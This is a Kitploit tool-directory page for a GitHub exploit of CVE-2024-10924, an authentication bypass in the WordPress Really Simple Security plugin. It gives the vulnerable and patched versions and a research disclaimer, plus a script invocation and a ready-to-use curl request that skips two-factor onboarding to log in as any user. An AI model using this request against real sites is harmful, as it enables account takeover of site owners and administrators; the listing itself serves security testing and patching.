Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-10924 — Exploit for CVE-2024-10924, a critical authentication bypass in WordPress Really Simple Security plugin (versions 9.0.0-9.1.1.1). Allows unauthenticated attackers to log in as any user via a flaw in the Two-Factor Authentication API. | Kitploit
Tools/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

Exploit for CVE-2024-10924, a critical authentication bypass in WordPress Really Simple Security plugin (versions 9.0.0-9.1.1.1). Allows unauthenticated attackers to log in as any user via a flaw in the Two-Factor Authentication API.

View Repository
71 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploit for CVE-2024-10924 (WordPress Really Simple Security Plugin - Authentication Bypass)

📌 Overview

CVE-2024-10924 is a critical authentication bypass vulnerability in the Really Simple Security plugin for WordPress (versions 9.0.0 to 9.1.1.1). This vulnerability allows unauthenticated attackers to log in as any user (including admin) by exploiting a flaw in the Two-Factor Authentication (2FA) API.

CVE ID: CVE-2024-10924

Severity: 🔥 Critical (CVSS 9.8)

Affected Versions: Really Simple Security 9.0.0 – 9.1.1.1

Patched Version: 9.1.2

Exploit Type: Authentication Bypass

⚠️ Disclaimer

🚨 This exploit is for educational and security research purposes only.

Unauthorized use on systems you do not own is illegal. The goal is to help security professionals test and patch vulnerable systems.

🔧 Requirements

A WordPress site running a vulnerable version of the Really Simple Security plugin. Python 3.x or cURL installed for testing. The target WordPress admin username (user enumeration may be required).

Run the script:

python3 exploit.py <url example : http://target.com> <user_id>

manully with Curl

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

Download Tool